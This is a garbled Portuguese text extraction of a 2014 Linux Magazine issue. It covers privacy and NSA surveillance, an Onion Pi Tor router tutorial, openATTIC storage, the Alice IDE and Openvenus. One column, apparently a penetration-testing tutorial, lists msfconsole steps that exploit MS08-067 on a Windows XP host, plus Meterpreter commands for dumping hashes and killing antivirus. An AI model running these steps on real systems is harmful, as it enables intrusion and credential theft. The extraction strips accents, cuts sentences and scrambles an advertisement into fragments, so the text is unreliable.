Beruflich Dokumente
Kultur Dokumente
MADDOG P.25
Trilhar o prprio caminho
leva a melhores resultados
A REVISTA DO PROFISSIONAL DE TI
PRIVACIDADE
UBUNTU PRIVACY REMIX
PRIVACIDADE
SEGURANA NO MAIS LUXO. PASSOU A SER UMA NECESSIDADE
PREMENTE EM TEMPOS ONDE SOMOS VIGIADOS O TEMPO TODO P.30
OPENATTIC
Ubuntu Privacy Remix: converta seu computador em uma ilha de segurana P.44
Medidas de segurana imprescindveis em tempos de NSA P.48
ALICE
SEGURANA
NSA
OPENVENUS
APACHE
ANLISE
RASPBERRYPI
WWW.LINUXMAGAZINE.COM.BR
#10802/14
R$ 14,90
7,50
Expediente editorial
Diretor Geral
Rafael Peregrino da Silva
rperegrino@linuxmagazine.com.br
Editores
Flvia Jobstraibizer
fjobs@linuxmagazine.com.br
Laura Loenert Lopes
llopes@linuxmagazine.com.br
Editor de Arte
Hunter Lucas Fonseca
hfonseca@linuxnewmedia.com.br
Colaboradores
Tim Schrmann, Konstantin Agouros, Kristian
Kissling, James Stanger, Jeff Layton, Kurt
Seifried, Zack Brown, Jon maddog Hall,
Alexandre Borges, Cezar Taurion, Charly Khnast,
Martin Loschwitz, Harry Knitter, Falko Benthin,
Valentin Hbel, Thomas Leichtenstern,Gilberto
Magalhes, Klaus Knopper, Augusto Campos.
Traduo
Laura Loenert Lopes
Reviso
Flvia Jobstraibizer
Editores internacionais
Uli Bantle, Andreas Bohle, Jens-Christoph Brendel,
Hans-Georg Eer, Markus Feilner, Oliver Frommel,
Marcel Hilzinger, Mathias Huber, Anika Kehrer,
Kristian Kiling, Jan Kleinert, Daniel Kottmair,
Thomas Leichtenstern, Jrg Luther, Nils Magnus.
Anncios:
Rafael Peregrino da Silva (Brasil)
anuncios@linuxmagazine.com.br
Tel.: +55 (0)11 3675-2600
Diretor de operaes
Claudio Bazzoli
cbazzoli@linuxmagazine.com.br
Na Internet:
www.linuxmagazine.com.br Brasil
www.linux-magazin.de Alemanha
www.linux-magazine.com Portal Mundial
www.linuxmagazine.com.au Austrlia
www.linux-magazine.es Espanha
www.linux-magazine.pl Polnia
www.linux-magazine.co.uk Reino Unido
www.linuxpromagazine.com Amrica do Norte
Apesar de todos os cuidados possveis terem sido tomados
durante a produo desta revista, a editora no responsvel por eventuais imprecises nela contidas ou por consequncias que advenham de seu uso. A utilizao de qualquer
material da revista ocorre por conta e risco do leitor.
Nenhum material pode ser reproduzido em qualquer meio,
em parte ou no todo, sem permisso expressa da editora.
Assume-se que qualquer correspondncia recebida, tal
como cartas, emails, faxes, fotografias, artigos e desenhos,
sejam fornecidos para publicao ou licenciamento a
terceiros de forma mundial no-exclusiva pela Linux New
Media do Brasil, a menos que explicitamente indicado.
Linux uma marca registrada de Linus Torvalds.
Linux Magazine publicada mensalmente por:
iMasters FFPA Informtica LTDA
Rua Claudio Soares, 72 Conj. 1302
05422-030 So Paulo SP Brasil
Tel.: +55 (0)11 3063-5941
Direitos Autorais e Marcas Registradas 2004 - 2014:
Linux New Media do Brasil Editora Ltda.
Impresso e Acabamento: EGB
Atendimento Assinante
www.linuxnewmedia.com.br/atendimento
So Paulo: +55 (0)11 3063-5941
ISSN 1806-9428
Impresso no Brasil
Editorial
Referentia
Se voc me disser quem so os seus heris, eu vou lhe dizer quem voc se tornar. A frase citada de autoria de Warren Buffet ( 30/08/1930 ), investidor e
filantropo estadunidense, presidente da Berkshire Hathaway, constantemente
citado na lista das pessoas mais ricas do mundo (ocupou o primeiro lugar em
2008). A estratgia de avaliao de Buffet to simples quanto eficiente: ele
est procurando pelas referncias de que dispomos, para avaliar nossas aspiraes. So essas referncias e o quanto estamos aferrados a elas que norteiam nossas conquistas, alimentam nossos sonhos, nos impelem ao trabalho
rduo incansvel, busca pela superao (nossa prpria e a da concorrncia).
Como acontece com pessoas, empresas tambm precisam de referncias, que se
traduzem em um planejamento estratgico, composto pelas aes que a empresa vai tomar para levar seu produto, servio ou soluo para o mercado. E nada
pode ser pior para uma empresa do que perder sua referncia e sofrer uma crise
de identidade. Isso pode ocorrer, por exemplo, quando o mercado muda (e os
poderes dos heris que formavam a base da identidade da empresa e garantiam
o seu sucesso em meio s adversidades no so mais eficazes), ou quando uma
grande referncia dentro da prpria empresa tem que ser substituda, e no possvel encontrar um timoneiro da mesma estatura para assumir o leme da companhia. Sem capacidade de inovar, a empresa passa a degenerar e a crise se instala.
No necessrio ir muito longe para imaginar vrias empresas no segmento
de tecnologia que tenham passado por perdas de referncia. Na dcada de 90,
a Apple viveu isso quando Steve Jobs deixou a companhia. A bola da vez a
Microsoft. Desde 21/07/1998, com a aposentadoria de Bill Gates, Steve Ballmer
conseguiu a proeza de reduzir o valor da ao ordinria da empresa em mais de
66%, valor que est, atualmente, 79% abaixo do seu valor de pico atingido em
25/03/1999, poca em que nos referamos empresa como a gigante do software.
Atropelada por empresas como Google, que soube usar Software Livre como ningum para criar uma gama de servios (em sua maioria gratuitos) como base para
um modelo de negcios inovador e auferir lucros atravs de publicidade assertiva,
e pela Apple, companhia que ajudou a salvar no final do sculo passado, e que foi
capaz de revolucionar o modo como a humanidade passou a interagir com tecnologia, a empresa de Bill Gates v erodir continuamente as bases do seu imprio.
Cogita-se, inclusive, que a prxima verso do Windows (a 9, codinome Treshold),
ser distribuda gratuitamente a quem se interessar. Incapaz de manter o ritmo
e acompanhar as mudanas do mercado de tecnologia (Software Livre, virtualizao, Cloud, redes sociais, mobilidade etc.), que paulatinamente abandona o PC
em favor de dispositivos portteis, a empresa, que segura seu faturamento por
meio do binmio Windows e Office, ainda deve passar por poucas e boas antes
de encontrar novamente um caminho que a conduza de volta trilha do sucesso.
Sem referncias para se apoiar, inserida em um mundo que mudou, at o fechamento desta edio, a Microsoft ainda no havia encontrado um substituto para
seu CEO, que anunciou em 2013 deixaria seu posto at o ms de agosto de 2014.
A lder se tornou coadjuvante. Manter pelo menos essa posio? Ouso duvidar.
Enquanto isso, temos Linux everywhere...
Rafael Peregrino da Silva
Diretor de Redao
3
INDICE
CAPA
Escondido na web
Espies a solta
30
31
Segurana consciente
Truques poderosos 48
Talvez no seja possvel parar a NSA,
mas o usurio ainda pode tomar medidas
significativas para proteger sua privacidade.
44
www.linuxmagazine.com.br
38
COLUNAS
CORPORATE
Charly Khnast08
Augusto Campos 09
Alexandre Borges10
Notcias 28
Kurt Seifried12
Klaus Knopper15
Zack Brown18
Notcias
24
TUTORIAL
56
59
PROGRAMAO
Procurando Nemo
70
REDES
Armazenamento limpo
66
ANALISE
A face de Vnus
75
SERVIOS
Editorial03
Emails06
Linux.local78
Preview
82
Coluna do Augusto
OpenBSD, milionrios
romenos e a continuidade
Um dos maiores valores e diferenciais que um projeto de cdigo aberto pode oferecer a continuidade.
por Augusto Campos
Coluna do Alexandre
Metasploit parte 8
Comandos teis do Meterpreter tendo como alvo o sistema operacional Windows XP para ataques direcionados.
por Alexandre Borges
root@kali:~# msfconsole
msf > search ms08-067
msf > use exploit/windows/ smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST
192.168.81.132
msf exploit(ms08_067_netapi) > show payloads
10
www.linuxmagazine.com.br
privilgio com o comando use priv antes do comando hashdump. Aps obter os hashes, uma opo
seria usar um cracker como John the Ripper ou
L0phtCrack para descobrir as senhas. Escrevi
um tutorial simples sobre o assunto que pode ser
acessado em [1];
background deixa a sesso do Meterpreter em segundo plano e volta para o prompt normal do msfconsole;
sessions -l lista as sesses ativas do Meterpreter;
session -i assume uma sesso do Meterpreter
de forma interativa;
run checkvm verifca se a mquina explorada executado em uma mquina virtual ou no;
run getcountermeasure realiza a verificao de quais
medidas de segurana esto implementadas na
mquina alvo;
run killav desabilita programas antivirus que esto em execuo na mquina de destino;
run scraper coleta diversas informaes sobre o
sistema alvo, incluindo o registro no caso de mquinas Windows, e salva em um diretrio local
(como /root/.msf4/logs/scripts/scraper);
Mais informaes
ALTA BOOKS
E
os
os livr m
s
o
d
o
T
co
so site
do nos desconto
e
30% d cdigo
com o onal* Cdigo:
ci
14
promo
ln x 2 0
Conhea tambm:
/altabooks
alta_books
www.altabooks.com.br
11
* Promoo vlida por tempo limitado, somente para compras realizadas no site www.altabooks.com.br
Coluna do Taurion
ivemos to empolgados com as inovaes tecnolgicas que muitas vezes esquecemos que
alm das inmeras oportunidades de utiliz-las
para criar rupturas nos negcios, tambm incorremos
em riscos. Big Data nos abre imensas possibilidades
de fazer anlises e correlaes impensveis h alguns
anos. Criamos oportunidades de conhecermos intimamente nossos clientes, abrindo espao para engajamentos contnuos com eles, afinal esto conectados aos seus smartphones e tablets todo o tempo e
sabemos onde cada um deles est a cada momento.
Mas tudo tem seu dark side e neste post gostaria de instigar um debate sobre alguns aspectos
que precisamos, pelo menos, melhor entender e
avaliar. Privacidade o tema. At que ponto queremos ou mesmo sabemos onde termina nossa
privacidade e que desejamos em troca dela?
Recentemente vimos revelaes da abrangncia da bisbilhotagem internacional praticada pela
NSA (National Security Agency) dos EUA. O volume
de dados a ser armazenado no seu mais novo data
center, no estado de Utah, com cerca de 10.000 m
para data storage ser equivalente a 12 exabytes,
o que significa que podero interceptar e guardar
todas as comunicaes telefnicas feitas por toda
a populao dos EUA em um perodo de 40 anos.
Um ms de conversaes gravadas demanda cerca de 270 petabytes e 12 exabytes corresponde a
12.000 petabytes. Mas, vamos alm disso. No nosso
dia a dia usamos plataformas sociais,
emails gratuitos e inmeros aplicativos. Sabemos o que todos estes
servios fazem com estes nossos
dados pessoais? De maneira geral
ns concedemos a estes servios o
direito de usar nossos dados ao clicar
em suas polticas de privacidade (ningum as l) em troca dos recursos que
nos oferecem. Afinal queremos permanecer conectados aos nossos amigos, queremos enviar uma mensagem curta e imediata. E porque no usar email gratuito?
As plataformas sociais tambm buscam
coletar volumes imensos de dados sobre
26
www.linuxmagazine.com.br
27
Capa
Espies solta
Segurana no mais luxo. Passou a ser uma necessidade premente em tempos onde somos vigiados o tempo todo.
por Flvia Jobstraibizer
30
Matrias de capa
Dados protegidos 31
Escondido na web 38
Segurana consciente 44
Truques poderosos 48
www.linuxmagazine.com.br
Tutorial
Desligado
56
www.linuxmagazine.com.br
Listagem 1:
Configurao DHCP
subnet 192.168.42.0 netmask
255.255.255.0 {
range 192.168.42.10
192.168.42.50;
option broadcastaddress
192.168.42.255;
option routers 192.168.42.1;
defaultleasetime 600;
hostapd isc-dhcp-server
tor
Listagem 2: Endereo
WLAN IP
iface lo inet loopback
iface eth0 inet dhcp
allowhotplug wlan0
iface wlan0 inet static
address 192.168.42.1
netmask 255.255.255.0
Listagem 3: Configurao
de servio Onion Pi
interface=wlan0
driver=rtl871xdrv
ssid=OnionPi
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=<password>
wpa_key_mgmt=WPAPSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP
rewall iptables [5]. Para comear, exclua qualquer regra existente com:
iptables F
iptables t nat F
na inicializao do sistema.
Redirecionamento Configurao
A comunicao entre a subrede do Tor
sem fio e o Tor requer alguns ajustes na configurao da rede. O primeiro passo abrir o arquivo /etc/
sysctl.conf e acrescentar net.ipv4.
ip_forward=1. O comando sysctl -p
permite a alterao. Em seguida,
devemos ajustar as regras do fi-
57
Gostou do artigo?
58
Concluso
Mais informaes
[1] Onion Pi: http://learn.adafruit.com/onionpi
[2] Extenso 1Button App, da Amazon:
http://threatpost.com/amazon1buttonbrowseraddonleaksdatainplaintext
[3] Chaos Computer Club: http://en.wikipedia.
org/wiki/Chaos_Computer_Club
[4] Raspbian: http://www.raspberrypi.org/downloads
[5] Projeto netfilter/iptables:http://www.netfilter.org/projects/iptables/
[6] Are you using Tor? https://check.torproject.org
www.linuxmagazine.com.br
Redes
Armazenamento limpo
O openATTIC promete o gesto de armazenamento unificado
para meios heterogneos. A interface web facilita o servio e
suporta drives de rede acessados via SMB e NFS.
por Martin Loschwitz
Figura 1 O openATTIC permite gerenciar unidades locais, volumes NFS, contas FTP e compartilhamentos Samba a partir de uma nica interface web.
Alm do suporte, a verso comercial oferece recursos como o Snap Apps, que cria snapshots consistentes de
sistemas virtuais e bancos de dados (os snapshots na verso comunitria s permitem imagens em um disco ou
baseadas em sistemas ZFS). Sob a forma de SMI-S, o openATTIC Enterprise pretende fornecer, no futuro, uma
interface independente de fornecedor para gerenciamento de tarefas, mas, de acordo com a IT Novum, este recurso
ainda est em desenvolvimento. A oferta de suporte na variao Enterprise da IT Novum durante a instalao do
openATTIC certamente interessante.
66
www.linuxmagazine.com.br
Primeiros passos
Hardware de
armazenamento
O gerenciamento de dispositivos
de armazenamento fsico est localizado abaixo das estatsticas e
viso geral dos recursos. O openATTIC suporta muitos tipos de
dispositivos de armazenamento
fsico e permite fcil administrao usando a interface web. Logo
abaixo de Disks, encontraremos
uma lista de discos que so locais
para a mquina, incluindo os grupos de volume criados em LVM.
Alternativamente, podemos usar
este menu para gerenciar dispositivos de armazenamento SAN
que esto ligados ao host, por
exemplo, via iSCSI.
67
Gerenciamento
de volumes
68
Gerenciamento
de sistema e alta
disponibilidade
O fato de que o openATTIC no
serve somente para o gerenciamento do armazenamento
claramente evidenciado pelos
recursos adicionais disponveis
na interface web. Em essncia,
o openATTIC quase uma ferramenta para administrao geral
do sistema. Por exemplo, podemos editar as placas de interface
de rede do sistema atravs da
interface web. Em Online Update, o openATTIC fornece um gerenciador de atualizao grfica
que executa o aptitude ao fundo.
O openATTIC automaticamente
descobre que os pacotes so atualizveis de uma forma regular;
s precisamos acionar esta ao.
Os desenvolvedores tambm
consideraram um outro requisito essencial dos sistemas de
armazenamento: a alta disponibilidade (HA). No openATTIC,
podemos implementar a alta disponibilidade atravs do recurso
Peers: para uma configurao
HA completa, inicialmente precisamos construir dois sistemas
openATTIC, cada um com sua
prpria chave API. Na interface
web, abaixo de Peers, podemos
Concluso
www.linuxmagazine.com.br
Mais informaes
Gostou do artigo?
Queremos ouvir sua opinio. Fale conosco em:
cartas@linuxmagazine.com.br
Este artigo no nosso site:
http://lnm.com.br/article/9112
NH O/
# 10 JU
ION p.10
3
AD MI N
Seguran
Redes &
MA GA ZIN
E
# 10
S EG U R A N
SEG URA NA
VIRTUA LIZ
VIRTUA LBO
p. 50
sempenho
OPENLAVA
de alto de
recursos
sistemas
OPE NLAVA
e
dor de
Compartilh
o gerencia
ste poderos
atravs de
T p. 68
HONEYPOques e vulnerabilidades
ata
e
Identifique
HoneypotM
as com o
em sistem
2
EDIO: orma de compartilhamento p.3
r plataf
BM NESTA
VEJA TA.MNetgear: saiba qual a meitolhomais poderoso p.45
mu
Nexenta VS
comando:
em linha de
PowerShell
NEX ENTA
NETGEA R
POW ERS HEL
L
p. 57
ava
Segurana
rver 2008
s Vista/Se
do Window
FIR EWA LL
LNM.COM.BR/SHOPPING
ndo
est muda
O hardware
novas
ente com
constantem
ores e a
rad
ele
ac
,
CPUs
de ambos.
integrao
r quais
Como sabe
ais
res so ide
do
ssa
proce
cdigo?
para cada
p. 26
FIREWALL
rewall
nada no fi
A
SEGURAN
ho em
desempen
o mximo
controlar
Como obter
gador para VirtualBox p.16
ples nave
sim
com
is
um
e
tua
Utiliz
quinas vir
per-V p.20
m
nte
3.0 do Hy
remotame
da verso
melhorias
Conhea as
A O
20 13
ES.
ERABILIDAD NA
SUAS VULN
RA
COM SEGU
SIM COMO
IA
AS
E
OG
-S
OL
M
TECN
NIZA
OVEITO DA
AS MODER
OS SISTEM TIRAR O MXIMO PR
os p.13
O
virtualizad
SAIBA COM
ambientes
HYP ER-V
VIRTUA L
ica
CEZAR TAUR
s tecnolg
quatro onda
Cloud nas
06 /2 01
p.23
N
I
M
D
A
RANQUINHO
MARCELO B
mas
aos proble
Antecipe-se
exemplar
s
ix Solari
Linux Un
.BR
M
Windows
O
C
.
E
GAZIN
WWW.A
DMIN-
de
te
Assinan
ven da
pro ibid a
MA
69
Programao
Procurando Nemo
Assim como podemos usar nosso ambiente de desktop, tambm podemos escrever programas
para ele: tudo o que precisamos um mouse, o Alice IDE, e algum tempo de aprendizado.
por Tim Schrmann
Verses
o ambiente
de desenvolvimento
Alice, no precisamos
digitar um nico comando
ou aprender uma linguagem diferente. Em vez disso, podemos
criar aplicativos e compilar todas
Configurao
Quadro 1: Dica
Se quiser se livrar de uma ao a partir do editor de cdigo, basta arrast-la de volta para a lista na parte inferior esquerda.
Uma lixeira aparece, e basta soltar o o item sobre ela.
70
www.linuxmagazine.com.br
Mecanismo
de elevao
71
Edit Code para retornar visualizao anterior, onde se visualiza Nemo no canto superior
esquerdo. Logo abaixo, encontraremos uma lista de todas as
aes e truques que Nemo tem
na manga. Poderamos falar com
ele, por exemplo, ou mov-lo. Alice refere-se a todas essas aes
como procedimentos.
Girando a roda
Perdidos
no espao
Assim como o peixe, mais alguns
objetos esto na cena: alm do
fundo, temos uma cmera atravs da qual podemos olhar diretamente para o oceano. No canto
superior esquerdo da janela, o
Alice lista todos os objetos, com
destaque para o objeto atualmente selecionado em amarelo.
A cmera e o solo tambm
tm propriedades que podem
ser modificadas. Para fazer isso,
clique sobre o nome do objeto
correspondente no canto superior esquerdo ou selecione-o na
borda direita do menu de seleo,
72
www.linuxmagazine.com.br
Para todo
o sempre
No final das contas, Nemo precisa aprender a se virar. Para que
isso acontea, arraste a curva de
rotao para uma posio abaixo
das outras duas no editor. Nemo
precisa girar no sentido horrio
(direita) por um valor de 0,5. Ele,
ento, olha para a esquerda novamente. Com mais uma ao de
movimento, Nemo flutua direto
sua posio inicial (para frente)
com um valor de 3,5. Mais uma
vez, digite isso como um Custom
DecimalNumber. Para simplificar,
podemos manter o valor padro
para a velocidade.
Finalmente, Nemo deve olhar
para a frente novamente. Para
isso, arraste o processo Turn para
o editor mais uma vez e rotacione
Nemo por 0,25. O programa deve
aparecer agora como mostrado na
figura 8. Depois de iniciar o cdigo
pressionando Run, Nemo nada para
73
Futuro
Concluso
Programao no to difcil.
Com Alice, alguns cliques do
mouse so o suficiente para deixar um peixe nadar no mar. Esta
animao simples apenas arranha
a superfcie das possibilidades do
ambiente de desenvolvimento.
Se o usurio gostou de trabalhar
com Alice at agora, pode simplesmente experimentar outros
procedimentos e funes. Pode
aguardar por um fim de semana
chuvoso, ou de folga para a experimentao: o Alice viciante
e o tempo voa quando estamos
nos divertindo com ele.
Uma viso geral da interface
do usurio fornecida pela ajuda online [2], guias detalhados,
screencasts do Alice 3.1 curriculum resources [3], e vrios
livros que fazem referncia ao
Alice 2 [4]. n
Mais informaes
[1] Alice: http://www.alice.org
[2] Alice online help: http://help.alice.org/w/page/57584293/Getting%20
Started%20with%20Alice%203_1
[3] Alice 3.1 Curriculum Resources:
http://www.alice.org/index.php?page=3.1/download_materials
[4] Livros sobre Alice 2:
http://www.alice.org/index.php?page=documentation
Gostou do artigo?
Figura 9 O loop while permite que os peixes
nadem para frente e para trs em um padro
infinito e predeterminado de movimento.
74
www.linuxmagazine.com.br
Anlise
A face de Vnus
A plataforma Openvenus visa simplificar a vida do administrador; ela executa comandos contra
grupos de servidores e distribui arquivos ou softwares diretamente de uma localizao central.
por Konstantin Agouros
O que o
sistema oferece
Administradores que instalarem
um servidor Openvenus (quadro 1),
possuem uma plataforma que facilita o gerenciamento centralizado
de sistema. O software no s controla as mquinas Linux (Red Hat,
Fedora, CentOS, SUSE), mas tambm Solaris ou HP-UX; possvel
at mesmo integrar os sistemas
Windows, se o ambiente Cygwin
estiver instalado.
Openvenus executa comandos simultaneamente em muitos
computadores. Para permitir que
isso acontea, os administradores
agrupam os dispositivos; um computador pode pertencer a vrios
grupos. Alm disso, o framework
distribui arquivos individuais ou
pacotes de software inteiros para
os sistemas gerenciados. Tecnicamente, o Openvenus compreende
um servidor mestre com os quais
os clientes a ser administrados so
conectados (figura 1). No servidor,
instalamos dois pacotes, Basic e
Server, embora os clientes s precisem do pacote bsico. Grandes
configuraes tambm podem
ser executadas em mais de um
75
Servidor Openvenus
Comandos , softwares e
configuraes com clientes
Cliente Openvenus
Cliente Openvenus
Cliente Openvenus
Muitos patres
Marcao
Distribuio
de software
Alm de realizar trabalhos com uma
API prpria, um segundo recurso
importante do Openvenus a distribuio de software. O software
suporta atualmente pacotes Solaris,
pacotes Linux no formato RPM e
tarballs. Antes que o usurio possa distribuir o software, precisar
verific-lo no servidor Openvenus.
Depois disso, o sistema lista, instala
ou cancela os pacotes na requisio.
Manter os arquivos de configurao proporciona uma fonte constante de trabalho. Se um servio
em um servidor for modificado,
Quadro 1: Instalao
O software est disponvel online [3] como um pacote de cdigo fonte. Para projetar e operar o
Openvenus, necessrio um sistema operacional com capacidade de multithread, como o Linux, alm de
Perl, OpenSSL e a biblioteca de utilitrios Afbackup [3]; a biblioteca do mesmo autor do Openvenus.
No laboratrio, os testes revelaram que no uma boa ideia simplesmente executar ./configure && make
&& make install. Em vez disso, use make rpms como o terceiro passo e instale os pacotes que este passo cria.
A razo que os RPMs transportam scripts de ps-instalao que, em particular, tornam muito mais fcil
provisionar o servidor que o mecanismo de make install.
76
www.linuxmagazine.com.br
ser preciso deixar algumas centenas de clientes na rede. O Openvenus gera um repositrio para
esses arquivos de configurao;
hosts podem ser adicionados aos
grupos com os mesmos arquivos
de configurao, como arquivos
especficos para Solaris ou Linux.
Para editar os arquivos de configurao, ser preciso verificar
o arquivo, alter-lo e verifica-lo
novamente. Como o repositrio
inclui controle de verso, configurao de rollbacks so possveis.
O controle de verso tambm se
aplica aos mtodos.
O comando ovpdistfile, em seguida, distribui o arquivo para um
grupo de clientes. O Openvenus faz
os lotes das tarefas se os clientes
individuais na lista de grupos no
estiverem disponveis, pacotes e
mtodos diversos podem ser combinados em um meta-pacote para
permitir que o Openvenus distribua
pacotes consistentes. A API tambm
fornece um recurso separado que
transfere os arquivos para o cliente
quando o mtodo executado. Este
recurso especialmente til quando um servio no possui apenas
um, mas vrios arquivos de configurao que sempre precisam ser
alterados juntos. Todas as aes
so registradas pelo Openvenus,
de forma que os administradores
possam controlar quem fez o qu
e quando.
Concluso
Mais informaes
[1] scVenus: http://www.scien
cecomputing.de/en/software/
systemmanagement.html
[2] Openvenus: http://source
forge.net/projects/openvenus/
[3] Afbackup: http://sourcefor
ge.net/projects/afbackup/
Gostou do artigo?
Queremos ouvir sua opinio.
Fale conosco em:
cartas@linuxmagazine.com.br
Este artigo no nosso site:
http://lnm.com.br/article/9103
77
Servios
Calendrio de eventos
Evento
Data
InterCon WordPress
31 de maio
ndice de anunci
Local
Empresa
Pg.
Supermicro
02
Altabooks
11
Alfresco
14
Unodata
20
Plus Server
InterCon PHP
InterCon Android
19 de julho
13 de setembro
22, 23
Sesc
27
Uol Cloud
29
Kontroller
43
Apiki
47
SpagoBi
55
netRevenda
58
Central Server
81
WatchGuard
83
SOFTWARE
80
Preview
82
www.linuxmagazine.com.br
Alugue um Firewall
gerenciado a partir
de R$ 300,00/ms.
vendas@altermedios.com.br
(11) 3393.3340